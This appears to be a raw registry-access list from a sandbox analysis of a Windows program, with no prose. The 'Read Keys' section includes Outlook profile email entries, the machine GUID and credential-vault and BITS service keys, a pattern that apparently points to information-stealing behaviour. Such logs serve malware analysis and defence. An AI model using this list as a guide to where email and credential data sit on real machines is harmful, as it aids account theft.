HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Resource-Exhaustion-Resolver/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\eventlog\Microsoft-Windows-ReliabilityAnalysisComponent/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ReliabilityAnalysisComponent/Operational\ChannelAccess
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index28 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64 